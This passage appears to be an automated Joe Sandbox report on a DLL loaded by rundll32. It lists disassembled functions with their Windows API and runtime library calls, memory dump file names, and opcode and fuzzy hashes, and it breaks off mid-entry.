                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$LongParentVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 506644340-0
                                                                                                                                  • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                                  • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                                  • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                                  • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10032A89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                                  • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                                  • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                                  • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                                  • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                                    • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                                    • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                                  • String ID: V&'
                                                                                                                                  • API String ID: 1067611704-802299783
                                                                                                                                  • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                                  • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                                  • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                                  • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10001390 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                                    • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2004563703-0
                                                                                                                                  • Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                                  • Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
                                                                                                                                  • Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                                  • Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10017632 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreate$Open
                                                                                                                                  • String ID: software
                                                                                                                                  • API String ID: 1740278721-2010147023
                                                                                                                                  • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                                  • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                                  • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                                  • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10001180 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                                    • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                                    • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                                    • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                                    • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Task_impl$H_prolog3
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1204490572-0
                                                                                                                                  • Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                                  • Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
                                                                                                                                  • Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                                  • Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10020A8E Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                                    • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                                  • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                                    • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                                  • _memset.LIBCMT ref: 10020AE2
                                                                                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 356813703-0
                                                                                                                                  • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                                  • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                                  • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                                  • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10020EEA Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$Brush
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2798902688-0
                                                                                                                                  • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                                  • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                                  • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                                  • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002981B Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                                    • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                                    • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                    • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                                    • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                                    • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 63617653-0
                                                                                                                                  • Opcode ID: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                                  • Instruction ID: 8f7f5911e4d3fd52506e0ebb541b856e7b36a578254e0be009e80c36fe1d785e
                                                                                                                                  • Opcode Fuzzy Hash: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                                  • Instruction Fuzzy Hash: 13F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002D1E9 Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                                  • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                                    • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                                  • _memset.LIBCMT ref: 1002D2F2
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4021759052-0
                                                                                                                                  • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                                  • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                                  • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                                  • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002D5D0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 1002D5FF
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                                    • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocString$H_prolog3_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 842698744-0
                                                                                                                                  • Opcode ID: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                                  • Instruction ID: 4ca028c9b4d427f08f2d669533113988f62624cee2fc7606aac8abf48e723189
                                                                                                                                  • Opcode Fuzzy Hash: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                                  • Instruction Fuzzy Hash: E9414A34900304CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100169E1 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                                    • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                                    • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                                    • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                                  • SendMessageA.USER32 ref: 10016A5B
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1877664794-0
                                                                                                                                  • Opcode ID: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                                  • Instruction ID: f13ef48dc5fb0c484cec2fa7b3f992f2dc6d3b1b42596072abe369902371925a
                                                                                                                                  • Opcode Fuzzy Hash: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                                  • Instruction Fuzzy Hash: 3B415B72A00258DBEB20CFA4CC81BDD76A8EF09350F614119E949AB281E770D9848F52
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10016936 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                                  • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                                  • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                                  • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                                  • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                                  • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 670545878-0
                                                                                                                                  • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                                  • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                                  • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                                  • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10020559 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                                  • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                                  • GetWindowRect.USER32 ref: 1002059C
                                                                                                                                  • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
